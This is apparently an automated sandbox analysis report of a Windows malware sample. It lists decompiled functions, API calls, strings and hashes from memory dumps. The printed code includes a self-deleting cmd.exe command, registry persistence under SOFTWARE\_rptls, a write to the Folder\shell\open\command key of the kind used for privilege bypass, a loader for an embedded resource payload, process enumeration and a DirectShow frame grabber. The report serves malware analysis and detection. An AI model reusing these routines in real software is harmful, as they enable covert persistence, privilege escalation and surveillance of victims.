String ID: %d of %d pages missing from overflow list starting at %d$2nd reference to page %d$database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7$failed to get page %d$freelist leaf count too big on page %d$invalid page number %d
API String ID: 2102423945-881679150
Opcode ID: cad8f94f2133fc8a03dca5ada1b6a09636e2914f0d6ea8f6d985d5533455bc32
Instruction ID: f418a967b1505abfef3409119aa3fb20b9059bb487f0901e9a5efb9d8f754bc7
Opcode Fuzzy Hash: cad8f94f2133fc8a03dca5ada1b6a09636e2914f0d6ea8f6d985d5533455bc32
Instruction Fuzzy Hash: B0B10E716046159FDB14DF18C880A6ABBE1EF85718F08815AFA984B382E771FD61CFE1

Uniqueness

Uniqueness Score: -1.00%

Function 04698970, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 212COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?,?,00000008), ref: 046989C7
GetTempPathW.KERNEL32(000000E6,?,?,00000008), ref: 046989F0

Strings

etilqs_, xrefs: 04698A9C, 04698AA7
%s\etilqs_, xrefs: 04698B06

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: PathTempVersion
String ID: %s\etilqs_$etilqs_
API String ID: 261301950-1420421710
Opcode ID: bd3d7cc9fa590f5a8544f3688a19fe419afccbedd6cb9d5a1fb43c95902317e0
Instruction ID: 3fe424d4134281c3fe6dd61f982089569ce6369b61e97f5c935dd981a2c9fe77
Opcode Fuzzy Hash: bd3d7cc9fa590f5a8544f3688a19fe419afccbedd6cb9d5a1fb43c95902317e0
Instruction Fuzzy Hash: 64719C71900255DFEB25EB388C41BFA7BE8AF1A304F0846D9D44587281FBB9AE85CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00402961, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 108
processthreadCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00402961() {
				char _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOA _v92;
				char _v352;
				char _v816;
				char _v817;
				char _v872;
				void* _t63;
				void* _t70;
				void* _t73;

				_t63 = _t70;
				_t73 = _t63;
				L00410F31(_t73 + 0x10);
				if( *((intOrPtr*)(_t73 + 0x68)) != 0) {
					TerminateThread( *0x54cbec, 0);
				}
				if( *((intOrPtr*)(_t73 + 0x50)) != 0) {
					E0041106C(_t73 + 4,  *((intOrPtr*)(_t73 + 8)), _t73 + 0x14, 0x20006, 0);
					E0040362D( &_v8, _t73 + 0x54);
					L00410F4C(_t73 + 4,  &_v8);
					L00405EA5(_v8);
					E00410FAE(_t73 + 4);
				}
				E00401052( &_v92, 0, 0x44);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				GetModuleFileNameA(0,  &_v352, 0x104);
				E0040102C( &_v872, "cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q ", 0x37);
				E0040102C( &_v817, "\"", 1);
				E0040102C( &_v816,  &_v352, E00401133( &_v352));
				E0040102C(E00401133( &_v352) + 0x38 +  &_v872, "\"", 2);
				CreateProcessA(0,  &_v872, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24);
				CloseHandle(_v24.hThread);
				CloseHandle(_v24);
				ExitProcess(0);
			}

0x00402961
0x00411728
0x0041172d
0x00411737
0x00411740
0x00411740
0x00411749
0x0041175d
0x00411769
0x00411774
0x0041177c
0x00411783
0x00411783
0x0041178f
0x00411799
0x0041179d
0x004117a3
0x004117a4
0x004117ad
0x004117c1
0x004117d5
0x004117f5
0x00411815
0x00411837
0x00411846
0x0041184b
0x0041184e

APIs

Part of subcall function 00410F31: RegDeleteKeyW.ADVAPI32(80000001,?), ref: 00410F38

TerminateThread.KERNEL32(00000000,?,?), ref: 00411740
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 004117AD
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00411837
CloseHandle.KERNEL32(?), ref: 00411846
CloseHandle.KERNEL32(?), ref: 0041184B
ExitProcess.KERNEL32 ref: 0041184E

Strings

cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q , xrefs: 004117BB

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseHandleProcess$CreateDeleteExitFileModuleNameTerminateThread
String ID: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
API String ID: 3630425516-84290196
Opcode ID: 0be599e64a9a9f9c34af0428b85f5f2c8100a9f6891cf91f1d5eb1b2bfee2ebc
Instruction ID: 0669df4c0b48276121317c389eaf51d9506befaeb36db9ccd3a74da0e324114f
Opcode Fuzzy Hash: 0be599e64a9a9f9c34af0428b85f5f2c8100a9f6891cf91f1d5eb1b2bfee2ebc
Instruction Fuzzy Hash: 763163B2900618FFDB11EBE1CD86EDF777DEB44304F004466B205A6191DB78AE84CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004119C9, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004119C9(void* __ecx) {
				void* _v8;
				int _v12;
				short* _t16;

				_t16 = L"SOFTWARE\\_rptls";
				if(RegOpenKeyExW(0x80000001, _t16, 0, 0xf003f,  &_v8) != 0) {
					RegCreateKeyExW(0x80000001, _t16, 0, 0, 0, 0xf003f, 0,  &_v8,  &_v12);
				}
				RegSetValueExW(_v8, L"Install", 0, 1, 0x54cbf0, lstrlenW(0x54cbf0) << 2);
				return RegCloseKey(_v8);
			}

0x004119dd
0x004119f1
0x00411a06
0x00411a06
0x00411a28
0x00411a3b

APIs

RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,000F003F,?,00000208,0054CBF0,?,?,?,?,00411A78), ref: 004119E9
RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,00000000,00000000,000F003F,00000000,?,?,?,?,?,?,00411A78), ref: 00411A06
lstrlenW.KERNEL32(0054CBF0,?,?,?,?,00411A78,?,?,?,?,004057B9,?,00000000,00000000), ref: 00411A12
RegSetValueExW.ADVAPI32(?,Install,00000000,00000001,0054CBF0,00000000,?,?,?,?,00411A78,?,?,?,?,004057B9), ref: 00411A28
RegCloseKey.ADVAPI32(?,?,?,?,?,00411A78,?,?,?,?,004057B9,?,00000000,00000000), ref: 00411A31

Strings

Install, xrefs: 00411A20
SOFTWARE\_rptls, xrefs: 004119DD, 004119E3, 00411A00

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseCreateOpenValuelstrlen
String ID: Install$SOFTWARE\_rptls
API String ID: 2036214137-3226779556
Opcode ID: 1448b5389596f841856a15a763dfb7c9bcc182f59020e913fb266beac556abf6
Instruction ID: 394209d5bc156890c72a6297613c1ccbf6f88d34747de2c12624768b323793dd
Opcode Fuzzy Hash: 1448b5389596f841856a15a763dfb7c9bcc182f59020e913fb266beac556abf6
Instruction Fuzzy Hash: AEF04F72500058BFE7205797EC4DEEB7FBCEBC6791B1040B9BA05E2121D6715E40C6B4

Uniqueness

Uniqueness Score: -1.00%

Function 00411A3C, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00411A3C(void* __ebx, void* __ecx, void* __eflags) {
				long _t2;
				void* _t8;
				struct HINSTANCE__* _t13;
				void* _t15;
				struct HRSRC__* _t18;

				_t15 = __ecx;
				E00401052(0x54cbf0, 0, 0x208);
				_t2 = GetModuleFileNameW(0, 0x54cbf0, 0x208);
				__imp__#680();
				if(_t2 == 0 && E0040FBFC() != 1) {
					E004119C9(_t15);
					_t13 = E00411CA2(_t15);
					_t18 = FindResourceW(_t13, 0x66, L"WM_DSP");
					_t8 = LoadResource(_t13, _t18);
					SizeofResource(_t13, _t18);
					if(LockResource(_t8) != 0) {
						E00411936(_t10);
					}
				}
				return 0;
			}

0x00411a3c
0x00411a4c
0x00411a58
0x00411a5e
0x00411a66
0x00411a73
0x00411a82
0x00411a8d
0x00411a91
0x00411a9b
0x00411aab
0x00411aaf
0x00411aaf
0x00411aab
0x00411ab8

APIs

GetModuleFileNameW.KERNEL32(00000000,0054CBF0,00000208,00000000,00000000,?,?,?,004057B9,?,00000000,00000000), ref: 00411A58
IsUserAnAdmin.SHELL32 ref: 00411A5E

Part of subcall function 0040FBFC: GetCurrentProcess.KERNEL32(00000008,00000000,74B60770,00000000,74B60770,00000000,?,?,?,?,00413589,?), ref: 0040FC0E
Part of subcall function 0040FBFC: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,00413589,?), ref: 0040FC15
Part of subcall function 0040FBFC: GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,00413589,?), ref: 0040FC33
Part of subcall function 0040FBFC: FindCloseChangeNotification.KERNEL32(00000000), ref: 0040FC48

Part of subcall function 004119C9: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,000F003F,?,00000208,0054CBF0,?,?,?,?,00411A78), ref: 004119E9
Part of subcall function 004119C9: RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,00000000,00000000,000F003F,00000000,?,?,?,?,?,?,00411A78), ref: 00411A06
Part of subcall function 004119C9: lstrlenW.KERNEL32(0054CBF0,?,?,?,?,00411A78,?,?,?,?,004057B9,?,00000000,00000000), ref: 00411A12
Part of subcall function 004119C9: RegSetValueExW.ADVAPI32(?,Install,00000000,00000001,0054CBF0,00000000,?,?,?,?,00411A78,?,?,?,?,004057B9), ref: 00411A28
Part of subcall function 004119C9: RegCloseKey.ADVAPI32(?,?,?,?,?,00411A78,?,?,?,?,004057B9,?,00000000,00000000), ref: 00411A31

FindResourceW.KERNEL32(00000000,00000066,WM_DSP,?,?,?,?,004057B9,?,00000000,00000000), ref: 00411A87
LoadResource.KERNEL32(00000000,00000000,?,?,?,?,004057B9,?,00000000,00000000,?,?,?,?,?,?), ref: 00411A91
SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,004057B9,?,00000000,00000000,?,?,?,?,?,?), ref: 00411A9B
LockResource.KERNEL32(00000000,?,?,?,?,004057B9,?,00000000,00000000,?,?,?,?,?,?,00000000), ref: 00411AA2

Part of subcall function 00411936: VirtualProtect.KERNEL32(00000000,000007D0,00000040,00000000,00000000,00000000,?,00000000,?,00411AB4,?,?,?,004057B9,?,00000000), ref: 00411974
Part of subcall function 00411936: VirtualAlloc.KERNEL32(00000000,000001FE,00001000,00000040,?,00000000,?,00411AB4,?,?,?,004057B9,?,00000000,00000000), ref: 00411988
Part of subcall function 00411936: GetWindowsDirectoryW.KERNEL32(00000000,00000104,?,00000000,?,00411AB4,?,?,?,004057B9,?,00000000,00000000), ref: 00411996
Part of subcall function 00411936: lstrlenW.KERNEL32(00000000,\System32\cmd.exe,00000028,?,00000000,?,00411AB4,?,?,?,004057B9,?,00000000,00000000), ref: 004119A4

Strings

WM_DSP, xrefs: 00411A7D

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Resource$CloseFindOpenProcessTokenVirtuallstrlen$AdminAllocChangeCreateCurrentDirectoryFileInformationLoadLockModuleNameNotificationProtectSizeofUserValueWindows
String ID: WM_DSP
API String ID: 88121427-506093727
Opcode ID: 7ef6ad4fe4161bfe5cb5d74be513fcbe20b09fd61d8dde34b9c40d3575c04885
Instruction ID: ff14ec2d81de0f128fb18523e9c8342e2cb5d54092beee342a8992e6e9539887
Opcode Fuzzy Hash: 7ef6ad4fe4161bfe5cb5d74be513fcbe20b09fd61d8dde34b9c40d3575c04885
Instruction Fuzzy Hash: BEF062716412907BD72037B3AC0DFDB2DACAFD2754F154436F606D62A1EA2888C1C26C

Uniqueness

Uniqueness Score: -1.00%

Function 00411855, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00411855(void* __ecx, char _a4, CHAR* _a8) {
				void* _v8;
				long _t9;
				int _t12;
				int _t15;
				long _t16;

				_t15 = lstrlenA(_a8);
				_t9 = RegOpenKeyExA(0x80000001, "Software\\Classes\\Folder\\shell\\open\\command", 0, 0x20006,  &_v8);
				if(_t9 == 0) {
					_t4 =  &_a4; // 0x416056
					_t16 = RegSetValueExA(_v8,  *_t4, 0, 1, _a8, _t15);
					RegCloseKey(_v8);
					if(_t16 == 0) {
						_t12 = 1;
					} else {
						_push(_t16);
						goto L2;
					}
				} else {
					_push(_t9);
					L2:
					SetLastError();
					_t12 = 0;
				}
				return _t12;
			}

0x00411863
0x0041187a
0x00411882
0x00411897
0x004118a6
0x004118a8
0x004118b0
0x004118b5
0x004118b2
0x004118b2
0x00000000
0x004118b2
0x00411884
0x00411884
0x00411885
0x00411885
0x0041188b
0x0041188b
0x004118b9

APIs

lstrlenA.KERNEL32(00411B3D,00416056,?,?,00411B3D,00416056,?), ref: 0041185D
RegOpenKeyExA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command,00000000,00020006,?,?,?,00411B3D,00416056,?), ref: 0041187A
SetLastError.KERNEL32(00000000,?,?,00411B3D,00416056,?), ref: 00411885
RegSetValueExA.ADVAPI32(?,V`A,00000000,00000001,00411B3D,00000000,?,?,00411B3D,00416056,?), ref: 0041189D
RegCloseKey.ADVAPI32(?,?,?,00411B3D,00416056,?), ref: 004118A8

Strings

Software\Classes\Folder\shell\open\command, xrefs: 00411870
V`A, xrefs: 00411897

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseErrorLastOpenValuelstrlen
String ID: Software\Classes\Folder\shell\open\command$V`A
API String ID: 1613093083-1166067495
Opcode ID: a382cb47b3b6cbe431fb1ceec69794051c22e485614749e84a556bed88be12ff
Instruction ID: 67f62c0d9d2396e2191d3c91f8353b719c1e7652dea8d9ddf4f1049f89fea6f7
Opcode Fuzzy Hash: a382cb47b3b6cbe431fb1ceec69794051c22e485614749e84a556bed88be12ff
Instruction Fuzzy Hash: DFF09075540214FBDF212FA1EC09FDA3F69EF08790F108161FB01B61A0D6758A80ABAC

Uniqueness

Uniqueness Score: -1.00%

Function 00405CA3, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00405CA3(void* __ecx) {
				_Unknown_base(*)()* _t2;
				void* _t4;

				_t4 = __ecx;
				_t2 = GetProcAddress(LoadLibraryA("USER32.DLL"), "MessageBoxA");
				if(_t4 == 0) {
					if(_t2 != 0) {
						_t2 =  *_t2(0, "An assertion condition failed", "Assert", 0x2010);
					}
					ExitProcess(1);
				}
				return _t2;
			}

0x00405ca9
0x00405cb7
0x00405cc0
0x00405cc4
0x00405cd7
0x00405cd7
0x00405cdb
0x00405cdb
0x00405ce1

APIs

LoadLibraryA.KERNEL32(USER32.DLL,?,004102E1,?,74B60770,00000000), ref: 00405CAB
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00405CB7
ExitProcess.KERNEL32 ref: 00405CDB

Strings

Assert, xrefs: 00405CCB
MessageBoxA, xrefs: 00405CB1
An assertion condition failed, xrefs: 00405CD0
USER32.DLL, xrefs: 00405CA4

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressExitLibraryLoadProcProcess
String ID: An assertion condition failed$Assert$MessageBoxA$USER32.DLL
API String ID: 881411216-1361702557
Opcode ID: b0587a7c36b41e7ed90a540dbc2d2eeb4f414d39a4cdcd411ecec0db7ec4c180
Instruction ID: f6ea2254eaf30196fa9925607221d9885049cc43d4f14e8b8c3ed5d004ce2483
Opcode Fuzzy Hash: b0587a7c36b41e7ed90a540dbc2d2eeb4f414d39a4cdcd411ecec0db7ec4c180
Instruction Fuzzy Hash: E9D05EB87C13417AEA1037B22C1EFE63A08ABD5F56F344032B641E61C1D6BA84C5C92C

Uniqueness

Uniqueness Score: -1.00%

Function 00410D24, Relevance: 12.2, APIs: 8, Instructions: 164
processCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00410D24(void* __ecx, void* __edx, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				int _v36;
				intOrPtr _v40;
				int _v44;
				char _v568;
				long _v596;
				char _v600;
				void* _v604;
				char _v1644;
				intOrPtr _t49;
				int _t54;
				struct tagPROCESSENTRY32W* _t57;
				int _t73;
				int _t77;
				int _t89;
				void* _t91;
				void* _t112;
				void* _t113;
				void* _t115;
				void* _t117;
				signed int _t119;
				void* _t120;
				signed int _t122;
				void* _t123;
				intOrPtr* _t124;
				void* _t125;

				_t125 = __eflags;
				_t112 = __edx;
				_t91 = __ecx;
				E00401052( &_v600, 0, 0x228);
				_t124 = _t123 + 0xc;
				_v604 = 0x22c;
				_v36 = 0;
				_t49 = 5;
				_v32 = _t49;
				_v40 = _t49;
				L004016E3( &_v44, _t125);
				_t113 = CreateToolhelp32Snapshot(2, 0);
				if(_t113 == 0xffffffff) {
					L14:
					E0040131A(_t91, __eflags,  &_v44);
					_t54 = _v44;
					__eflags = _t54;
					if(_t54 != 0) {
						_t119 =  *(_t54 - 4);
						_t115 = _t119 * 0xc + _t54;
						__eflags = _t119;
						if(_t119 != 0) {
							do {
								_t115 = _t115 - 0xc;
								E00401416(_t115);
								_t119 = _t119 - 1;
								__eflags = _t119;
							} while (_t119 != 0);
						}
					}
				} else {
					_t57 =  &_v604;
					Process32FirstW(_t113, _t57);
					_t127 = _t57;
					if(_t57 != 0) {
						do {
							_v16 = _v596;
							_v12 = 0;
							_v8 = 0;
							E004032FF( &_v12, _t112,  &_v568);
							_t120 = OpenProcess(0x1410, 0, _v596);
							__eflags = _t120 - 0xffffffff;
							if(_t120 == 0xffffffff) {
								E00403437( &_v8, E004035E5( &_v28, "-"));
								L00405EA5(_v28);
								_t34 =  &_v28;
								 *_t34 = _v28 & 0x00000000;
								__eflags =  *_t34;
							} else {
								E00401052( &_v1644, 0, 0x410);
								_t124 = _t124 + 0xc;
								_t77 =  &_v1644;
								__imp__GetModuleFileNameExW(_t120, 0, _t77, 0x208);
								__eflags = _t77;
								if(_t77 == 0) {
									E00403437( &_v8, E004035E5( &_v24, "-"));
									L00405EA5(_v24);
									_t29 =  &_v24;
									 *_t29 = _v24 & 0x00000000;
									__eflags =  *_t29;
								} else {
									E00403437( &_v8, E004035E5( &_v20,  &_v1644));
									L00405EA5(_v20);
									_v20 = _v20 & 0x00000000;
								}
								CloseHandle(_t120);
							}
							_t124 = _t124 - 0xc;
							_t121 = _t124;
							 *_t124 = _v16;
							E0040362D(_t121 + 4,  &_v12);
							E0040362D(_t121 + 8,  &_v8);
							E004015C0( &_v44);
							E00401416( &_v16);
							_t73 = Process32NextW(_t113,  &_v604);
							_push(0);
							_pop(0);
							__eflags = _t73;
						} while (__eflags != 0);
						CloseHandle(_t113);
						goto L14;
					} else {
						CloseHandle(_t113);
						E0040131A(_t91, _t127,  &_v44);
						_t89 = _v44;
						if(_t89 != 0) {
							_t122 =  *(_t89 - 4);
							_t117 = _t122 * 0xc + _t89;
							if(_t122 != 0) {
								do {
									_t117 = _t117 - 0xc;
									E00401416(_t117);
									_t122 = _t122 - 1;
								} while (_t122 != 0);
							}
						}
					}
				}
				return _t91;
			}

0x00410d24
0x00410d24
0x00410d3f
0x00410d41
0x00410d46
0x00410d49
0x00410d56
0x00410d5b
0x00410d5c
0x00410d5f
0x00410d62
0x00410d70
0x00410d75
0x00410efd
0x00410f03
0x00410f08
0x00410f0b
0x00410f0d
0x00410f0f
0x00410f15
0x00410f17
0x00410f19
0x00410f1b
0x00410f1b
0x00410f20
0x00410f25
0x00410f25
0x00410f25
0x00410f1b
0x00410f19
0x00410d7b
0x00410d7b
0x00410d83
0x00410d89
0x00410d8b
0x00410dce
0x00410dd7
0x00410de1
0x00410de4
0x00410de7
0x00410dfe
0x00410e00
0x00410e03
0x00410e9a
0x00410ea2
0x00410ea7
0x00410ea7
0x00410ea7
0x00410e09
0x00410e17
0x00410e1c
0x00410e1f
0x00410e2e
0x00410e34
0x00410e36
0x00410e6f
0x00410e77
0x00410e7c
0x00410e7c
0x00410e7c
0x00410e38
0x00410e4b
0x00410e53
0x00410e58
0x00410e58
0x00410e81
0x00410e81
0x00410eae
0x00410eb1
0x00410eb3
0x00410ebc
0x00410ec8
0x00410ed0
0x00410ed8
0x00410ee5
0x00410eeb
0x00410eed
0x00410eee
0x00410eee
0x00410ef7
0x00000000
0x00410d8d
0x00410d8e
0x00410d9a
0x00410d9f
0x00410da4
0x00410daa
0x00410db0
0x00410db4
0x00410dba
0x00410dba
0x00410dbf
0x00410dc4
0x00410dc4
0x00410dc9
0x00410db4
0x00410da4
0x00410d8b
0x00410f30

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410D6A
Process32FirstW.KERNEL32(00000000,0000022C), ref: 00410D83
CloseHandle.KERNEL32(00000000), ref: 00410D8E

Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
Part of subcall function 004035E5: KiUserExceptionDispatcher.NTDLL ref: 00403620

Part of subcall function 00403437: lstrcpyW.KERNEL32 ref: 0040345C

Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD

OpenProcess.KERNEL32(00001410,00000000,?,?), ref: 00410DF8
GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 00410E2E
CloseHandle.KERNEL32(00000000,00000000,00414C14), ref: 00410E81
Process32NextW.KERNEL32(00000000,0000022C), ref: 00410EE5
CloseHandle.KERNEL32(00000000), ref: 00410EF7

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseHandle$Process32lstrlen$CreateDispatcherExceptionFileFirstFreeModuleNameNextOpenProcessSnapshotToolhelp32UserVirtuallstrcpy
String ID:
API String ID: 1221420079-0
Opcode ID: 87a75b65bd4023ad9bd35cadea24abb8ea73caf76cba5f8a2c9d6d5648da2227
Instruction ID: 9a7a2f070f2fca196465514d4b0992d0753fe5cef1253bc48716d49042ca90ac
Opcode Fuzzy Hash: 87a75b65bd4023ad9bd35cadea24abb8ea73caf76cba5f8a2c9d6d5648da2227
Instruction Fuzzy Hash: C051A472D00119ABDB10EBA1CC49AEEBB78AF54715F01057AF405B72D0EB789BC5CB58

Uniqueness

Uniqueness Score: -1.00%

Function 04697C80, Relevance: 12.1, APIs: 8, Instructions: 140filesleepCOMMON

Download Yara Rule

APIs

LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 04697CD4
Sleep.KERNEL32(00000001), ref: 04697CE2
GetLastError.KERNEL32 ref: 04697CF2
UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 04697D33

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: File$ErrorLastLockSleepUnlock
String ID:
API String ID: 3015003838-0
Opcode ID: 68141ff034d1ea726de3c1bd6acbd35e1689f8e98aa35b54f2f0ed9ad40f890c
Instruction ID: eb7ed422cbbf25e94b6aaa7264798b5d64c8b67550793bc418cb61e723dba91d
Opcode Fuzzy Hash: 68141ff034d1ea726de3c1bd6acbd35e1689f8e98aa35b54f2f0ed9ad40f890c
Instruction Fuzzy Hash: C841D875A22214EBDF218F14E4407BA7BE8EB54726F28C557ED089F340E6B5EC448BD0

Uniqueness

Uniqueness Score: -1.00%

Function 046D7270, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 205COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 046D7426

Strings

sqlite3_extension_init, xrefs: 046D72C2
error during initialization: %s, xrefs: 046D73D5
not authorized, xrefs: 046D72A1
unable to open shared library [%s], xrefs: 046D730A
no entry point [%s] in shared library [%s], xrefs: 046D737B

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: _memset
String ID: error during initialization: %s$no entry point [%s] in shared library [%s]$not authorized$sqlite3_extension_init$unable to open shared library [%s]
API String ID: 2102423945-3409965631
Opcode ID: b814b692c2d978d6d4ac0e9d1101690b36d7291f78d60ed214e958195189cc07
Instruction ID: 46c0a9575cb964d8059664c846ba7deb6aad3be099b159952c020cf2046b4635
Opcode Fuzzy Hash: b814b692c2d978d6d4ac0e9d1101690b36d7291f78d60ed214e958195189cc07
Instruction Fuzzy Hash: D85161B2A00201ABE710DEA9EC81BBB73D8EB95315F04452DFE48C6340FB65F91587E2

Uniqueness

Uniqueness Score: -1.00%

Function 00412D0A, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 168
comCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E00412D0A(signed int __ecx, signed int _a4) {
				intOrPtr _v38;
				intOrPtr _v44;
				intOrPtr _v48;
				void* _v112;
				char _v128;
				intOrPtr _v132;
				char _v200;
				intOrPtr _t49;
				intOrPtr* _t54;
				intOrPtr* _t58;
				intOrPtr* _t60;
				intOrPtr* _t71;
				signed int _t76;
				intOrPtr* _t78;
				intOrPtr* _t79;
				intOrPtr* _t80;
				intOrPtr* _t85;
				signed int _t91;
				intOrPtr* _t96;
				intOrPtr* _t97;
				intOrPtr* _t104;
				signed int _t107;
				intOrPtr* _t111;
				intOrPtr* _t112;
				intOrPtr* _t113;
				intOrPtr* _t118;
				void* _t119;
				void* _t120;
				void* _t121;

				_t76 = __ecx;
				__imp__CoInitialize(0);
				_t111 = __ecx + 0x18;
				__imp__CoCreateInstance(0x4145a0, 0, 1, 0x417410, _t111);
				_t78 =  *_t111;
				if(_t78 != 0) {
					_t104 = __ecx + 0x1c;
					_t49 =  *((intOrPtr*)( *_t78))(_t78, 0x414580, _t104);
					_t79 =  *_t104;
					if(_t79 != 0) {
						_t49 =  *((intOrPtr*)( *_t79 + 4))(_t79);
						_t112 = __ecx + 0x20;
						if(_t112 != 0) {
							_t49 = E00412A6B(_a4, _t112);
						}
						if( *_t112 != 0) {
							_t113 = _t76 + 0x24;
							__imp__CoCreateInstance(0x4145f0, 0, 1, 0x417400, _t113);
							_t80 =  *_t113;
							if(_t80 != 0) {
								 *((intOrPtr*)( *_t80 + 0xc))(_t80,  *((intOrPtr*)(_t76 + 0x20)), L"Source");
								_t54 =  *_t113;
								 *((intOrPtr*)( *_t54 + 0xc))(_t54,  *_t104, L"Grabber");
								E00401052( &_v128, 0, 0x48);
								_t58 =  *((intOrPtr*)(_t76 + 0x18));
								_t121 = _t120 + 0xc;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								 *((intOrPtr*)( *_t58 + 0x10))(_t58,  &_v128);
								_t49 = L00412688();
								 *((intOrPtr*)(_t76 + 0x28)) = _t49;
								if(_t49 != 0) {
									_t49 = L004126A4();
									 *((intOrPtr*)(_t76 + 0x2c)) = _t49;
									if(_t49 != 0) {
										_t85 =  *((intOrPtr*)(_t76 + 0x24));
										_t49 =  *((intOrPtr*)( *_t85 + 0x2c))(_t85,  *((intOrPtr*)(_t76 + 0x28)), _t49);
										if(_t49 >= 0) {
											_t60 =  *((intOrPtr*)(_t76 + 0x18));
											 *((intOrPtr*)( *_t60 + 0x14))(_t60,  &_v200);
											E0040102C(_t119 + _v132 + 0x30 - _v132 - 0x60, _v132 + 0x30, 0x28);
											E004124EB( &_v200);
											_t107 = _a4;
											E00412B2A(_t76, _v132 + 0x30, _t107, _v44, _v48, _v38);
											E00405CA3(_t76 & 0xffffff00 | _t107 -  *((intOrPtr*)(_t76 + 0xc)) > 0x00000000);
											_t91 = 7;
											memcpy(_t121 + 0xc - 0x1c,  *( *((intOrPtr*)(_t76 + 4)) + _t107 * 4), _t91 << 2);
											E004125D8( *_t76);
											_t49 = L00412688();
											 *((intOrPtr*)(_t76 + 0x30)) = _t49;
											if(_t49 != 0) {
												_t71 =  *((intOrPtr*)(_t76 + 0x18));
												 *((intOrPtr*)( *_t71 + 0x24))(_t71,  *_t76, 0);
												_t96 =  *((intOrPtr*)(_t76 + 0x24));
												_t118 = _t76 + 0x34;
												_t49 =  *((intOrPtr*)( *_t96))(_t96, 0x4145c0, _t118);
												_t97 =  *_t118;
												if(_t97 != 0) {
													return  *((intOrPtr*)( *_t97 + 0x1c))(_t97);
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return _t49;
			}

0x00412d18
0x00412d1a
0x00412d20
0x00412d32
0x00412d38
0x00412d3c
0x00412d44
0x00412d4e
0x00412d50
0x00412d54
0x00412d5d
0x00412d60
0x00412d65
0x00412d6c
0x00412d6c
0x00412d74
0x00412d7a
0x00412d8c
0x00412d92
0x00412d96
0x00412da7
0x00412daa
0x00412db6
0x00412dc1
0x00412dcb
0x00412dd1
0x00412dd7
0x00412dda
0x00412ddb
0x00412ddc
0x00412de5
0x00412de6
0x00412de7
0x00412de8
